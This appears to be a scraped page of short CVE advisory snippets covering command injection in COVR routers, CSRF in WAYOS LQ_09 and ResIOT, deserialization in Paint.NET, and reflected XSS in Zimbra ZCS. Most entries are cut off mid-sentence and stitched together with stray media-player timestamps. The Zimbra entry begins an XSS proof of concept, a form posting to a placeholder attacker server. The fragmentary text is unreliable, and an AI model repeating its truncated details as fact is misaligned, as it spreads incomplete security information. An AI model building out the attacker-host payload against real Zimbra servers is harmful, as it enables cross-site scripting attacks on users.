CVE-2022-42161 The COVR 1200,1202,1203 v1.08 was found to have a command injection vulnerability in the SetTriggerWPS/PIN parameter.
The command injection can be exploited by issuing a request to set a custom WPS pin. An attacker can exploit the command injection to change
CVE-2022-41489 - CSRF Vulnerability in WAYOS LQ_09 22.03.17V Usb_upload.htm Explained
Disclosure Date: October 2022
Vulnerability Type: Cross-Site Request Forgery (CSRF)
Affected Product: WAYOS LQ_09, Firmware Version 22.03.17V
Component: Usb_upload.htm
Introduction
CVE-2022-34020 The ResIOT IOT Platform and LoRaWAN Network Server has a CSRF vulnerability that can be used to add new admin users. This vulnerability could also have other impacts.
This vulnerability allows remote attackers to add new admin users to the platform or other unspecified impacts by sending a CSRF request to the application.
CVE-2018-18447 dotPDN Paint.NET before 4.1.2 allows Deserialization of Untrusted Data (issue 2 of 2).
These issues could result in remote code execution. To verify your application's resistance to these issues, you can run it through an automated
CVE-2022-41349 An attachUrl parameter in ZCS 8.8.15 is vulnerable to Reflected XSS.
The attached file must be uploaded through the administration interface. Consider the following example.
form action="http://[attacker's server]:8080/h/compose?
Episode
00:00:00
00:00:00